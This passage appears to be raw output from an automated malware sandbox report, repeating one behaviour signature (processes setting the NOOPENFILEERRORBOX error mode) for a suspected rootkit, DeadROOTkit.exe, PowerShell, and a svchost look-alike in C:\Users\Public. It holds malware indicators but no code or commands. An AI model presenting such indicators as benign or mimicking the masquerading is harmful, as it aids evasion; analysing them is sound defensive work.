                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
